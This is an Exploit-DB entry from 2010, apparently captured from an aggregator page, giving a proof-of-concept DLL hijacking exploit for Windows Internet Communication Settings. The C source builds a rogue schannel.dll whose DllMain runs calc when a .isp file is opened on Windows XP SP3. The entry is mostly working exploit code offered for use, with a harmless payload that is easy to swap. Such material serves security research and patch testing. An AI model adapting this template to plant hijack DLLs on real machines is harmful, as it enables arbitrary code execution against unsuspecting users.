Lucene search

K
exploitdbALPdaemonEDB-ID:14780
HistoryAug 25, 2010 - 12:00 a.m.

Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking

2010-08-2500:00:00
ALPdaemon
www.exploit-db.com
18

AI Score

7.4

Confidence

Low

/*
# Exploit Title: Windows Internet Communication Settings DLL Hijacking Exploit 
(schannel.dll)
# Date: 25/08/2010
# Author: ALPdaemon
# Email: ALPdaemon (at) yahoo (dot) com
# Software Link: N/A
# Tested on: Windows XP SP3 English
# Extension: .isp
*/
#include <windows.h>

int alpdaemon()
{
  WinExec("calc", SW_SHOW);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  alpdaemon();
  return 0;
}


      

AI Score

7.4

Confidence

Low

Related for EDB-ID:14780